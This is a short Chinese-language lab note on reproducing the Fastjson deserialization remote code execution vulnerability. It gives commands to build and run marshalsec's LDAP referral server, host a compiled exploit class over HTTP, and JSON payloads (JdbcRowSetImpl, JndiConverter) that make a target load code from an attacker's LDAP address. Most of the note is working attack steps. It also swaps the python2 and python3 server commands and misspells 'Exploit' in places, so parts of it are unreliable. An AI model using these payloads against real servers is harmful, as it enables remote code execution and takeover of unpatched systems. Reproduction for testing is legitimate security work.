Fastjson 远程代码扫描漏洞复现
- 环境搭建
1)反序列化攻击工具源码下载:https://github.com/mbechler/marshalsec
使用maven命令:mvn clean package -DskipTests 编译成.jar文件
启动(默认端口1389):java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip/#Expolit
- 编写Expolit.java文件
使用javac Expolit.java,编译成为class文件
python2: python -m http.server 80
python3: python -m SimpleHTTPServer 80 - payload:
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit", "autoCommit":true}
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","dataSourceName":"ldap://ip:1389/Exploit", "autoCommit":true}【ip也可直接在http://dnslog.cn/中获取】
{"a":"a\x
参考:
https://www.cnblogs.com/Akkuman/p/11190475.html
https://github.com/RealBearcat/Fastjson-Payload